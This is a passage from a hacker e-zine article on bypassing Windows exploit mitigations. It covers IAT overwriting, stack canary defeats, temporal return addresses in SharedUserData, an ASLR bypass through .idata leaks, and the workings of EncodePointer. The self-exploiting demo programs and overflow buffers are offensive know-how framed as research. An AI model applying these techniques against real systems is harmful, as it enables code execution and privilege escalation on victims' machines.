.aware eZine Beta - Underground Research


[==============================================================================]
[-------[ Beating some counter-exploitation measures on WinNT+ systems ]-------]
[==============================================================================]


       _.d####b._
     .############.
   .################.
  .##################.__ __ __ __ _ _ __ __ 
  ##############/´_`|#\ V  V // _` | '_/ -_)
  ##############\__,|# \_/\_/ \__,_|_| \___|
  ###########>'<######                                     
  *#########(   )####* 
   ##########>.<#####    author:   Nomenumbra/[0x00SEC]
    ################     remember: http://www.bash.org/?753599
     *############*       
       "T######T"


--[ 0x00 ]--------------------------------------------[ Table Of Contents ]-----

  [ 0x00 ] Table Of Contents
  [ 0x01 ] Intro
  [ 0x02 ] IAT overwriting
  [ 0x03 ] Beating ASLR through global static values and .idata disclosure
  [ 0x04 ] A look at the M$ Pointer hijacking protection api
  [ 0x05 ] Greetings 'n shoutz
  

--[ 0x01 ]--------------------------------------------------------[ Intro ]-----


Welcome, ladies and gentlemen, to this article - aimed at laying out a few 
relatively fresh (and some new) concepts and techniques for exploiting WinNT+ 
systems armed with counter-exploitation techniques. Sure, there are more areas 
to cover concerning this topic, but those have been dealt with, over and over 
again, whilst most of the stuff in this paper is either scarcely documented or 
new. I hope you'll enjoy your read.


--[ 0x02 ]----------------------------------------------[ IAT overwriting ]-----


The following program is a simple demonstration of how canary values work:

------------------------------------------------------------------------[SNIP]--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
  unsigned char canary;        // canary value
  char buffer[256];
  char buffer2[289];
  canary = 0xAB;               // assign value
  memset(buffer,0x00,256);     // zero out the memory
  
  // construct evil buffer
  memset(buffer2,0x90,271);    // 256+12+3 (12+3 bytes is mingw compiler
                               // specific junk on my test box so it seemed)
  memset(buffer2+271,0xAB,1);  // canary
  memset(buffer2+272,0x90,12); // +12 bytes to EIP
  memset(buffer2+284,0xFF,4);  // eip
  buffer2[288] = 0x00;         // terminator, so strcpy stops here
  strcpy(buffer,buffer2);
  
  if(canary != 0xAB)
  {
    printf("Canary corruption!\n");
    exit(0);
  }
  
  printf("You made it!\n");
  return 0;
}
------------------------------------------------------------------------[/SNIP]-

This is a pretty casual overflow with strcpy(0022FE60,buffer2);

    0022FE60 == start of dest buffer
    0022FF6F == canary location

If we take a look at what is between the end of the buffer (0022FF60) and the 
canary location (0022FF6F), we get the following dump:

    0022FF60  AD AE C0 77 38 07 91 7C  ­®Àw8‘|
    0022FF68  FF FF FF FF A8 FF 22     ÿÿÿÿ¨ÿ"

Now, 0x77C0AEAD is a memory address in msvcrt.dll and 0x7C910738 is a memory 
address in ntdll.dll - but they reference nothing in particular, so my guess is 
this is just mingw-specific junk, which we'll ignore. The main point is: Dealing 
with static canaries is trivial, as demonstrated above. But what if we used a 
randomized canary? Let's look at a slightly modified example:

------------------------------------------------------------------------[SNIP]--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>           // GetTickCount

int main(int argc, char *argv[])
{
  unsigned char saved_canary;
  unsigned char canary;
  char buffer[256];
  char buffer2[289];  
  srand(GetTickCount());
  saved_canary = (unsigned char)(rand()%0xFF);
  canary = saved_canary;
  memset(buffer,0x00,256);
  memset(buffer2,0x90,270);    // 256+12+2
  memset(buffer2+270,0xAB,1);  // canary
  memset(buffer2+271,0xAB,1);  // saved_canary
  memset(buffer2+272,0x90,12); // space in between
  memset(buffer2+284,0xFF,4);  // eip
  buffer2[288] = 0x00;         // terminator, so strcpy stops here
  strcpy(buffer,buffer2);  	
  if(canary != saved_canary)
  {
    printf("Canary corruption!\n");
    exit(0);
  }
  printf("You made it!\n");
  return 0;
}
------------------------------------------------------------------------[/SNIP]-


As we can see, the canary value is compared to a saved_canary value, which makes 
this implementation downright stupid: The saved_canary sits right next to the
canary on the stack and can trivially be overwritten as well. Now what if we
store the saved_canary value somewhere else? Like this for example?


------------------------------------------------------------------------[SNIP]--
unsigned char saved_canary;

int main(int argc, char *argv[])
{
  unsigned char canary;
  char buffer[256];

  /* ... */
------------------------------------------------------------------------[/SNIP]-

Well, this can be solved by overwriting with a really long buffer:

    buffer address = 0x0022FE60
    saved_canary address = 0x00404060
    diff = 0x1D4200

Hence, buffer+diff = saved_canary. Note that this only works when all memory in
between is writable. However, memory isn't always writable, and a static NULL 
byte canary might be used.
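
The distance calculation above is plain pointer arithmetic. A minimal sketch,
assuming 32-bit addresses and a target located above the buffer (the function
name is made up for illustration):

```c
#include <stdint.h>

/* Number of bytes that must be written, starting at the buffer, before the
   first byte of the target is reached. Assumes target_addr > buffer_addr. */
uint32_t overflow_distance(uint32_t buffer_addr, uint32_t target_addr)
{
    return target_addr - buffer_addr;
}
```

Fed with the two addresses listed above, overflow_distance(0x0022FE60,
0x00404060) gives the 0x1D4200 byte gap the overflow would have to bridge.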

In these situations, on Linux platforms, we can help ourselves with GOT
overwriting. For those unfamiliar with the attack, I'll give a short example.
Imagine the following app:

  char* ptr = NULL;
  char array[10];
  ptr = array;
  strcpy(ptr,argv[1]);
  printf("test one two three...\n");
  strcpy(ptr,argv[2]);
  printf("%s\n",ptr);
  
The basic idea is that we are somehow unable to overflow EIP (either by stack
protection or otherwise) and must overwrite the ptr value with a value of our
choice. Now, if we look closely at the example we can see that the first strcpy
can overflow array. If we overflow array and modify ptr with it, we can control
the destination address of the second strcpy, yielding an arbitrary write.

The Global Offset Table (GOT) redirects position independent address
calculations to an absolute location and is located in the .got section of an
ELF executable or shared object. To quote c0ntex on this:

"It stores the final (absolute) location of a function calls symbol, used in
dynamically linked code. When a program requests to use printf() for instance,
after the rtld locates the symbol, the location is then relocated in the GOT and
allows for the executable via the Procedure Linkage Table, to directly access
the symbols location."

Printf would look something like this:

    Location 1: call 0x80482b0 <printf>   (PLT)
    Location 2: jmp *0x8049550            (GOT)

Where location 2 is the GOT table entry.

If we manage to overwrite ptr with printf()'s GOT entry addr, we can modify the
entry and redirect execution of the following printf() to any address we want,
for example the libc function system() and then supply the name of a suid shell
as an argument.

Now, on Linux this is a pretty well-known technique, but that isn't the case for
its Windows equivalent. In fact, I haven't seen it being documented anywhere.

The PE file format equivalent of the GOT is the Import Address Table (IAT). The
IAT is used as a lookup table when the application is calling a Windows API
function. Because a compiled PE DLL/EXE cannot know in advance where the other
DLLs it depends upon are located in memory, an indirect jump is required. As the
dynamic linker loads modules and joins them together, it writes the actual
addresses of the destination functions into the IAT slots. If we look at the
disassembly of a simple application utilizing printf we can see the following:

00401376  |. E8 45050000    CALL <JMP.&msvcrt.printf>           ; \printf

Now, if we take a look at the destination of this call:

004018C0   $-FF25 04514000  JMP DWORD PTR DS:[<&msvcrt.printf>]  ; msvcrt.printf
004018C6     90             NOP
004018C7     90             NOP
004018C8     00             DB 00
004018C9     00             DB 00
004018CA     00             DB 00
004018CB     00             DB 00
004018CC     00             DB 00
004018CD     00             DB 00
004018CE     00             DB 00
004018CF     00             DB 00
004018D0   $-FF25 0C514000  JMP DWORD PTR DS:[<&msvcrt.strcpy>]  ; msvcrt.strcpy


As you can see, this stub performs a jump through the address stored at
0x00405104 (the operand bytes 04 51 40 00 are little-endian). So the DWORD
located at 0x00405104 is taken and that DWORD is treated as the address to which
we jump: the address of the printf function prologue in msvcrt.dll. I will now
present an example demonstrating IAT hijacking.
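
As a warm-up, the indirection itself can be modelled in portable C. This is
only a toy model under stated assumptions: iat_slot stands in for a single IAT
entry, call_import for the JMP stub, and all names are hypothetical. It shows
nothing more than the fact that whoever controls the slot controls the call.

```c
#include <stdio.h>

typedef int (*import_fn)(const char *);

/* The function the loader would normally resolve the import to. */
int real_print(const char *s) { return printf("%s\n", s); }

/* The attacker's replacement target. */
int hijacked(const char *s) { (void)s; return -1; }

/* Hypothetical one-entry "IAT": holds the resolved address. */
import_fn iat_slot = real_print;

/* Models the stub: fetch the DWORD from the slot and jump to it. */
int call_import(const char *s) { return iat_slot(s); }

/* Models the arbitrary write landing on the slot. */
void overwrite_slot(import_fn *slot, import_fn new_target)
{
    *slot = new_target;
}
```

After overwrite_slot(&iat_slot, hijacked), every later call_import() ends up
in hijacked() although the calling code itself was never touched.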

This is a self-exploiting vulnerable app:

------------------------------------------------------------------------[SNIP]--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DIFF 28

// 0x7C81CDDA: ExitProcess kernel32.dll address
#define BUF2 "\xDA\xCD\x81\x7C"

char buffer[500];

int main(int argc, char **argv)
{
        char* pointer = NULL;
        char array[10];
        memset(buffer,0,500);
        memset(buffer,0x90,DIFF);
        strcpy(buffer+DIFF,"\x04\x51\x40\x00"); // printf IAT entry

        pointer = array;
        
        strcpy(pointer, buffer); // argv[1]
        printf("Array contains %s at %p (%p)\n", pointer, &pointer,pointer);
        strcpy(pointer, BUF2);
        printf("Array contains %s at %p (%p)\n", pointer, &pointer,pointer);
        return 0;
}
------------------------------------------------------------------------[/SNIP]-


As you can see, we overflow array by filling it with NOP bytes and overwriting
char* pointer with the address of the printf IAT entry (0x00405104). Once it's
overwritten, the second strcpy operation will copy the address of the
ExitProcess function located in kernel32.dll to the IAT slot of printf,
redirecting the next printf() call to ExitProcess. This technique is pretty
powerful, since it allows us to beat both non-executable stacks and canary
protection. Let me demonstrate this:


------------------------------------------------------------------------[SNIP]--
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// still 28, remember the mingw-specific compiler junk?
#define DIFF 28
#define BUF2 "\xDA\xCD\x81\x7C"
//0x7c81cdda exitprocess kernel32.dll address

unsigned char saved_canary;
char buffer[500];

void SomePrivilegedFunction() { }

int main(int argc, char **argv)
{
        char* pointer = NULL; // array + 28
        unsigned char canary; // array + 27
        char array[10];
                
        saved_canary = (unsigned char)(rand()%0xFF);
        canary = saved_canary;
        
        memset(buffer,0,500);
        memset(buffer,0x90,DIFF);
        strcpy(buffer+DIFF,"\xF8\x50\x40\x00"); // exit() IAT entry

        pointer = array;
        
        strcpy(pointer, buffer); // argv[1]                
        printf("[%s]\n",pointer);
        strcpy(pointer, BUF2);
        if(canary != saved_canary)
        {
          exit(0);
        }
        else
          printf("[%s]\n",pointer);
        return 0;
}
------------------------------------------------------------------------[/SNIP]-


This app, a modification of the previously shown app, is self-exploiting, too. 
Only this time, a canary value is introduced and we will exit() if it doesn't
match. The solution is obvious: we overwrite exit()'s IAT entry. But since we
don't control the arguments, what good can come from overwriting it like this?
Let us see:

00401387  |. 3A05 60404000  CMP AL,BYTE PTR DS:[404060]              ; |
0040138D  |. 74 0C          JE SHORT iathijac.0040139B               ; |
0040138F  |. C70424 0000000>MOV DWORD PTR SS:[ESP],0                 ; |
00401396  |. E8 55050000    CALL <JMP.&msvcrt.exit>                  ; \exit
0040139B  |> 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]             ; |

As we can see, the comparison located at 0x00401387 is followed by a conditional
jump to either the function exit or continuation of code execution flow at
0x0040139B.

So if we overwrite exit()'s IAT entry with, for example, the address of
SomePrivilegedFunction, we still fully control code execution flow. Hell, we can
supply the address of our buffer as well, potentially making it execute
shellcode (that is, on systems with an executable stack, else we'll have to
resort to pure api call replacement or code flow redirection). Also note that
this technique might be of use in combination with other attacks.

For example, when we cannot redirect code flow or supply a useful API for
overwriting, we can still manipulate the program into unauthorized behavior in
another way, for example by overwriting the IAT entry of the exit() call, when
we know that this call is made after supplying a wrong password. We can then
overwrite the entry with the address of the code branch which is normally taken
upon a successful password check, elevating our privileges. Note that these
write-anything-anywhere situations might seem rare, but are far more common in
format-string exploits.



--[ 0x03 ]--------------------------[ Beating ASLR through global         ]-----
                                    [ static values and .idata disclosure ]

A recurring issue when it comes to reliable exploitation is that of finding a
decent return address. Usually we use an opcode configuration located in a
loaded module or (in some rare cases) located in the mapped executable memory
itself. However, when ASLR is involved, things tend to get a bit tricky, and if
we don't want to rely on prediction or bruteforce, we'll have to find another
way to locate a decent return address. Now, on Linux systems, there is the old
linux-gate.so.1 technique. To quote izik's paper:

"'Linux-gate.so.1' is a dynamically shared object (DSO). It's life purpose is to
speed up and support system calls and signal/sigreturn for the kernel within the
user application. In particular it helps out handling a situation where a system
call accepts six parameters. This is when the EBP register has to be overwritten
and serve as the 6th parameter to the system call. Notice that this ties the
usage and need of linux-gate.so.1 to only linux kernels that are running under
ia32 and ia32-64 architectures."

Due to its nature, linux-gate.so.1 is always located at address 0xffffe000, so
we can search from 0xffffe000 to 0xffffeFFF for the desired opcode bytes to get
reliable return addresses.
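
The search itself is a plain byte scan. A minimal sketch, assuming the page
has already been copied into a local buffer (how the bytes are obtained is out
of scope here, and find_opcode is a made-up helper name):

```c
#include <stddef.h>
#include <string.h>

/* Return the offset of the first occurrence of pat inside mem,
   or -1 if the pattern does not occur. */
long find_opcode(const unsigned char *mem, size_t len,
                 const unsigned char *pat, size_t patlen)
{
    if (patlen == 0 || len < patlen)
        return -1;
    for (size_t i = 0; i + patlen <= len; i++) {
        if (memcmp(mem + i, pat, patlen) == 0)
            return (long)i;
    }
    return -1;
}
```

Adding the returned offset to the base of the scanned region (0xffffe000 in
the linux-gate case) yields the candidate return address.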

On Windows however, there is no such thing as linux-gate.so.1 so we must look
for other statically located memory areas. Now let us consider timers and
counters: if we manage to find a timer or counter variable in memory, and its
range is big enough, we know that at a given time this counter/timer will
contain our opcode configuration (say we're looking for a jmp esp, which is
0xFFE4). Now, for using this technique in a reliable exploit we must know:

 0) The interval of the timer/counter
 1) The starting value of the timer/counter
 2) The range of the timer/counter
 3) The (static) address of the timer/counter

So say we have a given timer counting from a given date - January the 1st, 1970,
say. This timer has an interval of 1 second and a size of 4 bytes. Determining
the interval can be done in a number of ways, unless one already has knowledge
of the usage of said timer. One such method might be Skape's Telescope program
discussed in his "Temporal Return Addresses" article for Uninformed. Now, if we
are on the same machine, exploiting a local vulnerability, determining local
time is trivial, but what to do when we are attacking a remote machine?

There are several techniques we can use to determine remote system time.

0) Using NetRemoteTOD in combination with NULL sessions.

   It is possible to use a standard windows API for determining the remote time.
   Doing so requires establishing a NULL session first. For those unfamiliar
   with the concept: http://rusecure.rutgers.edu/add_sec_meas/nullssn.php

   A small C example of code establishing a connection:

   NETRESOURCE nr;
   nr.lpRemoteName = "\\\\server\\resource";
   nr.dwType = RESOURCETYPE_DISK;
   nr.lpLocalName = NULL;
   nr.lpProvider = NULL;
   WNetAddConnection2(&nr,(LPSTR) szPassWord,(LPSTR) szUserName,0);

   Now fetching the remote time goes as follows:

   WCHAR wszNetbios[200];
   TIME_OF_DAY_INFO *tinfo=NULL;
   // convert string
   mbstowcs(wszNetbios, szServer, 200);
   // return server time of day
   NetRemoteTOD(wszNetbios,(LPBYTE *)&tinfo);
          
   As you can see, the TIME_OF_DAY_INFO structure provides plenty of information
   for us to deal with: http://msdn2.microsoft.com/en-us/library/aa370959.aspx

1) ICMP TIMESTAMP 

   We can use the ICMP TIMESTAMP request to obtain the number of milliseconds
   since midnight UT. If we can obtain the timezone we can obtain the exact
   remote time. Obtaining the timezone can be done by performing an IP WHOIS
   lookup for example.

2) HTTP Server Date Header

   If a HTTPd is running on the target machine, we can potentially fetch the
   remote date from the HTTP header.

3) IP Timestamps Option

   Just like the ICMP TIMESTAMP request, IP also has a timestamp option that
   measures the number of milliseconds since midnight UT.
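
For the two timestamp-based methods, the value on the wire is a 32-bit
big-endian count of milliseconds since midnight UT. A small sketch of turning
that into a clock reading (struct and function names are hypothetical, and
sending the actual request is not shown):

```c
#include <stdint.h>

struct utc_clock {
    unsigned hour, minute, second, msec;
};

/* Read a 32-bit big-endian value as it appears in the packet. */
uint32_t read_be32(const unsigned char b[4])
{
    return ((uint32_t)b[0] << 24) | ((uint32_t)b[1] << 16) |
           ((uint32_t)b[2] << 8)  |  (uint32_t)b[3];
}

/* Split milliseconds-since-midnight into hours, minutes, seconds, msec. */
struct utc_clock split_ms_since_midnight(uint32_t ms)
{
    struct utc_clock c;
    c.msec   = ms % 1000; ms /= 1000;
    c.second = ms % 60;   ms /= 60;
    c.minute = ms % 60;   ms /= 60;
    c.hour   = ms % 24;
    return c;
}
```

A timestamp of 45296789, for instance, corresponds to 12:34:56.789 UT.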


Now let us look at a special memory region found in all processes on Windows
NT+. This memory region, known as NtSharedUserData, is always located at the
same static address, namely 0x7ffe0000. The structure looks like this on WinXP
SP2:

   +0x000 TickCountLow     : Uint4B
   +0x004 TickCountMultiplier : Uint4B
   +0x008 InterruptTime    : _KSYSTEM_TIME
   +0x014 SystemTime       : _KSYSTEM_TIME
   +0x020 TimeZoneBias     : _KSYSTEM_TIME
   +0x02c ImageNumberLow   : Uint2B
   +0x02e ImageNumberHigh  : Uint2B
   +0x030 NtSystemRoot     : [260] Uint2B
   +0x238 MaxStackTraceDepth : Uint4B
   +0x23c CryptoExponent   : Uint4B
   +0x240 TimeZoneId       : Uint4B
   +0x244 Reserved2        : [8] Uint4B
   +0x264 NtProductType    : _NT_PRODUCT_TYPE
   +0x268 ProductTypeIsValid : UChar
   +0x26c NtMajorVersion   : Uint4B
   +0x270 NtMinorVersion   : Uint4B
   +0x274 ProcessorFeatures : [64] UChar
   +0x2b4 Reserved1        : Uint4B
   +0x2b8 Reserved3        : Uint4B
   +0x2bc TimeSlip         : Uint4B
   +0x2c0 AlternativeArchitecture : _ALTERNATIVE_ARCHITECTURE_TYPE
   +0x2c8 SystemExpirationDate : _LARGE_INTEGER
   +0x2d0 SuiteMask        : Uint4B
   +0x2d4 KdDebuggerEnabled : UChar
   +0x2d5 NXSupportPolicy  : UChar
   +0x2d8 ActiveConsoleId  : Uint4B
   +0x2dc DismountCount    : Uint4B
   +0x2e0 ComPlusPackage   : Uint4B
   +0x2e4 LastSystemRITEventTickCount : Uint4B
   +0x2e8 NumberOfPhysicalPages : Uint4B
   +0x2ec SafeBootMode     : UChar
   +0x2f0 TraceLogging     : Uint4B
   +0x2f8 TestRetInstruction : Uint8B
   +0x300 SystemCall       : Uint4B
   +0x304 SystemCallReturn : Uint4B
   +0x308 SystemCallPad    : [3] Uint8B
   +0x320 TickCount        : _KSYSTEM_TIME
   +0x320 TickCountQuad    : Uint8B
   +0x330 Cookie           : Uint4B

One of the purposes of SharedUserData is to provide processes with a global and
consistent method of obtaining certain information that may be requested
frequently. The reason why it's located at a static address is a design issue.
Prior to Windows XP, system calls were dispatched through the soft-interrupt
0x2E. From XP SP0 on however, they designed a way to support processor-specific
instructions for system calls, such as sysenter or syscall. To support this,
Microsoft added fields to the NtSharedUserData structure, namely the SystemCall
related fields. If we take a look at the disassembly of the data located at
NtSharedUserData.SystemCall on XP SP0 systems:

    7ffe0300 8bd4             mov edx,esp
    7ffe0302 0f34             sysenter
    7ffe0304 c3               ret

Those familiar with Windows system calls will immediately recognize this as the
m$ way of calling NT syscalls. This is why all syscalls performed by Windows
APIs reference NtSharedUserData.SystemCall:

    mov  edx,0x7ffe0300
    call edx

Because SharedUserData contained executable instructions, the SharedUserData
mapping had to be marked as executable. However, starting from XP SP2 and 2003
SP1 they realized that this might pose a security risk (O RLY?). So instead of
positioning executable instructions there, they replaced them with pointers, as
seen on XP SP2 systems:

    +0x300 SystemCall       : 0x7c90eb8b
    +0x304 SystemCallReturn : 0x7c90eb94

So all syscall stubs were changed like this:

    mov     edx,0x7ffe0300
    call    dword ptr [edx]

The address referenced by NtSharedUserData.SystemCall is the address of
ntdll.KiFastSystemCall, which is the same code stub previously located at
NtSharedUserData.SystemCall. Now all WinNT+ systems prior to XP SP2 and win2k3
SP1 have an executable SharedUserData, which makes it perfectly suited as a
static return address location. As we discussed earlier, we can use timer
variables as a return address location, and SharedUserData has three of them,
namely:

   +0x000 TickCountLow     : Uint4B
   +0x008 InterruptTime    : _KSYSTEM_TIME
   +0x014 SystemTime       : _KSYSTEM_TIME
   
Now, let us look at them with our prerequisites for a good temporal return
address in mind. Let us first look at TickCountLow. TickCountLow is used, in
combination with TickCountMultiplier to calculate the number of milliseconds
since boot like this:

MilliSeconds = TickCountLow * TickCountMultiplier >> 24
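
In C the product has to be widened to 64 bits before shifting, otherwise the
upper bits are lost. A minimal sketch of the formula (the function name is
invented for illustration):

```c
#include <stdint.h>

/* Milliseconds since boot, following the formula above. The multiplication
   is done in 64 bits so that the >> 24 sees the full product. */
uint32_t ticks_to_ms(uint32_t tick_count_low, uint32_t tick_count_multiplier)
{
    return (uint32_t)(((uint64_t)tick_count_low * tick_count_multiplier) >> 24);
}
```

With an illustrative multiplier of 0x0FA00000 (15.625 ms per tick, an assumed
value that varies with hardware), 64 ticks come out as 1000 ms.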

Because the initial value is unknown to us, and the update interval may vary
among different hardware architectures, this value is quite unreliable. We can
however, use the TCP timestamping technique to determine the current value and
interval.

The InterruptTime value stores a 100 nanosecond counter counting the amount of
time spent processing system interrupts. Due to its unpredictable nature, both
regarding interval and initial value, this variable is virtually unusable.

The SystemTime value is a 100 nanosecond counter measured from Jan. 1, 1601.
This time is relative to the timezone the target machine is using. So if we
obtain that information, we can use the SystemTime value as a very useful
temporal return address.
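
Once the remote clock is known as a Unix timestamp, predicting SystemTime is
a matter of shifting the epoch and scaling to 100 nanosecond units. A sketch,
assuming any timezone correction has already been applied to the input and
that the counter is viewed as one 64-bit value (helper names are made up):

```c
#include <stdint.h>

#define SECS_1601_TO_1970 11644473600ULL /* seconds between the two epochs */
#define TICKS_PER_SECOND  10000000ULL    /* 100 ns units per second */

/* Convert seconds since Jan. 1, 1970 to 100 ns units since Jan. 1, 1601. */
uint64_t unix_to_systemtime(uint64_t unix_seconds)
{
    return (unix_seconds + SECS_1601_TO_1970) * TICKS_PER_SECOND;
}

/* Low and high 32-bit halves of the 64-bit counter. */
uint32_t systemtime_low(uint64_t systemtime)  { return (uint32_t)systemtime; }
uint32_t systemtime_high(uint64_t systemtime) { return (uint32_t)(systemtime >> 32); }
```

The low half wraps every 2^32 * 100 ns, which is roughly 429.5 seconds, so it
cycles through every byte pattern quite often, while the high half changes
slowly.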

Now, the last step is to calculate the exact point of time when the target
variable will contain a valuable opcode. Let us consider a 32 bit double word
initialized with 0x00000000 at a given time, being continually incremented by Z
at an interval of X. Now, there are plenty of useful opcodes, including jmp/call
esp, pop/pop/ret for SEH overwrites, and so forth. Let's consider a trivial jmp
esp, which is 0xFFE4. Also let our target variable be located at address Y.
During a full loop the pattern FFE4 shows up at 5 positions in the value:

 1) 0xFFE4<UUUU>
 2) 0x<U>FFE4<UUU>
 3) 0x<UU>FFE4<UU>
 4) 0x<UUU>FFE4<U>
 5) 0x<UUUU>FFE4
 
where U is any hex digit. Only the byte-aligned cases 1, 3 and 5 can serve as
instruction bytes. Keep in mind that x86 stores the double word little-endian,
so the bytes sit in memory in reverse order: to actually find FF E4 at Y+2, the
value to wait for is 0xE4FF<UUUU>. The arithmetic is the same for any target
value. The first time, 0xFFE4<UUUU> is reached after a time of
((0xFFE40000 * X)/Z) and lasts for 

   (((0xFFE50000-0xFFE40000-1)*X)/Z) =  ((0xFFFF * X)/Z).
    
Given this technique, we can calculate the exact time and time window of valid
opcode occurrences.
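
The two expressions above translate directly into code. A sketch under the
same assumptions as the text (counter starts at 0 and grows by Z every X
seconds); the function names are hypothetical, and doubles are used only to
keep the example short:

```c
#include <stdint.h>

/* Seconds until the counter first reaches `value`. */
double time_to_reach(uint32_t value, double interval_x, uint32_t step_z)
{
    return ((double)value * interval_x) / (double)step_z;
}

/* Seconds during which the counter stays within [first, last]. */
double window_length(uint32_t first, uint32_t last,
                     double interval_x, uint32_t step_z)
{
    return ((double)(last - first) * interval_x) / (double)step_z;
}
```

For the 0xFFE4<UUUU> case, time_to_reach(0xFFE40000, X, Z) gives the start of
the window and window_length(0xFFE40000, 0xFFE4FFFF, X, Z) its duration. Any
other target value, such as a byte-swapped one, plugs in the same way.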

Another interesting trick becomes applicable when exploiting a format string bug
yielding a read-anything from anywhere situation. Since .idata includes the
import directory as well as the import address name table and is statically
located, we can deduce the address of any given function. For every imported
module there is a special structure in the .idata section (as worked out by
Caolan McNamara):

    typedef struct tagImportDirectory
        {
        DWORD    dwRVAFunctionNameList;
        DWORD    dwUseless1;
        DWORD    dwUseless2;
        DWORD    dwRVAModuleName;
        DWORD    dwRVAFunctionAddressList;
        }IMAGE_IMPORT_MODULE_DIRECTORY,
         * PIMAGE_IMPORT_MODULE_DIRECTORY;

Each one of these entries points to information for the given imported module.

dwRVAFunctionNameList is a relative virtual address that points to a list of
RVAs, each pointing to the null-terminated string of an imported function name.
The dwUseless DWORDS are simply padding area. dwRVAModuleName is a relative
virtual address that points to the module name.

dwRVAFunctionAddressList is a RVA pointing to a list of RVAs that will be loaded
upon PE loading time. This list contains the addresses of the loaded functions.
Now, by using a read-anything-from-anywhere situation, we can read from this
statically located dwRVAFunctionAddressList to deduce the address of an imported
function. If we then subtract the correct offset, which isn't randomized, we
can obtain the base address for the given randomized module and beat ASLR in
this fashion.
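
The subtraction is trivial, but spelled out for completeness. A sketch with
hypothetical helper names; the RVA used in the note below is an assumed,
illustrative number that in practice has to come from the export table of the
exact DLL build on the target:

```c
#include <stdint.h>

/* Base of the module = leaked absolute address - the function's fixed RVA. */
uint32_t module_base(uint32_t leaked_function_va, uint32_t function_rva)
{
    return leaked_function_va - function_rva;
}

/* Absolute address of any other item in the same module. */
uint32_t rebase(uint32_t base, uint32_t rva)
{
    return base + rva;
}
```

If, say, a leaked entry reads 0x7C81CDDA and the function is assumed to sit at
RVA 0x1CDDA, the module base comes out as 0x7C800000, and rebase() then turns
any other RVA in that module into a usable address.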



--[ 0x04 ]------------[ A look at the M$ Pointer hijacking protection API ]-----


Somewhere in 2006, Michael Howard blogged about Microsoft's EncodePointer /
EncodeSystemPointer APIs which were designed to make pointer hijacking more
difficult. Now, for those who don't know what pointer hijacking is, it's
actually pretty simple. Consider a vulnerable function:


------------------------------------------------------------------------[SNIP]--
int VulnFunc(char *szString) {

  DWORD fp;
  char buf[32];
  fp = (DWORD)&SomeFunc;
  #ifdef DEBUG
    printf("[*] fp == 0x%04x\n",fp);
  #endif

  strcpy(buf,szString);

  #ifdef DEBUG
    printf("[*] fp == 0x%04x\n",fp);
  #endif
  if (fp)
    (*(void (*)(void)) fp)();
  return 0;
}
------------------------------------------------------------------------[/SNIP]-


Now, this simple stack overflow would usually be exploited by casually
overwriting EIP. But what if, for some reason, we can't supply a big enough
string (szString is too small for example)? Well, in that case we could
overwrite the fp pointer and gain control of code execution flow that way, upon
execution of (*(void (*)(void)) fp)(). Example:

When running the function using szString = "test" we get the following output:

[*] fp == 0x401290
[*] fp == 0x401290

When supplying a buffer of "\x90"x44,"\x41"x4 we get the following output:

[*] fp == 0x401290
[*] fp == 0x41414141

Now, starting from Windows XP SP2 and Windows Server 2003 SP1, M$ supplies us
with the EncodePointer / DecodePointer and EncodeSystemPointer APIs. These
functions encode the pointer and decode it before usage, adding a layer of
security when using long-lived pointers. A small example:


------------------------------------------------------------------------[SNIP]--
int Functionlol(char *szString) {

  DWORD fp;
  DWORD fp2;
  char buf[32];
  
  fp = (DWORD)&SomeFunc;
  fp2 = 0xCAFEBABE;

  #ifdef DEBUG
  printf("[*]Before encoding of fp:\n");
  printf("[*] fp == 0x%04x\n",fp);
  printf("[*] fp2 == 0x%04x\n",fp2);
  #endif

  fp = (DWORD)(*(PVOID (*)(PVOID)) EncodePointer)(&SomeFunc);

  #ifdef DEBUG
  printf("[*]After encoding of fp and before b0f:\n");
  printf("[*] fp == 0x%04x\n",fp);
  printf("[*] fp2 == 0x%04x\n",fp2);
  #endif

  strcpy(buf,szString);

  #ifdef DEBUG
  printf(
    "[*]After encoding of fp and after b0f, before decoding of fp to fp2:\n");
  printf("[*] fp == 0x%04x\n",fp);
  printf("[*] fp2 == 0x%04x\n",fp2);
  #endif

  fp2 = (DWORD)(*(PVOID (*)(PVOID)) DecodePointer)((void*)fp);

  #ifdef DEBUG
  printf("[*]After decoding of fp to fp2:\n");
  printf("[*] fp == 0x%04x\n",fp);
  printf("[*] fp2 == 0x%04x\n",fp2);
  #endif
  
  if (fp2)
    (*(void (*)(void)) fp2)();
  return 0;
}
------------------------------------------------------------------------[/SNIP]-


Note that I loaded EncodePointer and DecodePointer directly from kernel32.dll
using GetProcAddress. Let us see how this works out:

When setting szString = "test"

[*]Before encoding of fp:
[*] fp == 0x401290
[*] fp2 == 0xcafebabe
[*]After encoding of fp and before b0f:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After encoding of fp and after b0f, before decoding of fp to fp2:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After decoding of fp to fp2:
[*] fp == 0xc910c294
[*] fp2 == 0x401290

As we can see, fp gets neatly encoded and eventually decoded to fp2.
Now, when attempting a buffer overflow attack:

[*]Before encoding of fp:
[*] fp == 0x401290
[*] fp2 == 0xcafebabe
[*]After encoding of fp and before b0f:
[*] fp == 0xc910c294
[*] fp2 == 0xcafebabe
[*]After encoding of fp and after b0f, before decoding of fp to fp2:
[*] fp == 0x41414141
[*] fp2 == 0x90909090
[*]After decoding of fp to fp2:
[*] fp == 0x41414141
[*] fp2 == 0x88119145

As we can see, fp gets encoded and eventually overwritten with 0x41414141. The
problem lies in the fact that this value gets decoded to fp2, resulting in a
false address. EncodeSystemPointer / DecodeSystemPointer work in exactly the
same manner, with one major difference. EncodePointer uses a per-process
randomized value, whilst EncodeSystemPointer uses a system-wide unique value.

Interesting ... but how do these functions work exactly?

Let us first look at EncodeSystemPointer, since this function is the least
secure. EncodeSystemPointer is located at 0x7C91AFC8 in kernel32.dll on my box,
which disassembles to:

7C91AFC8 > 8BFF             MOV EDI,EDI
7C91AFCA   55               PUSH EBP
7C91AFCB   8BEC             MOV EBP,ESP
7C91AFCD   A1 3003FE7F      MOV EAX,DWORD PTR DS:[7FFE0330]
7C91AFD2   3345 08          XOR EAX,DWORD PTR SS:[EBP+8]
7C91AFD5   5D               POP EBP
7C91AFD6   C2 0400          RETN 4

Obviously DecodeSystemPointer is exactly the same as EncodeSystemPointer, since
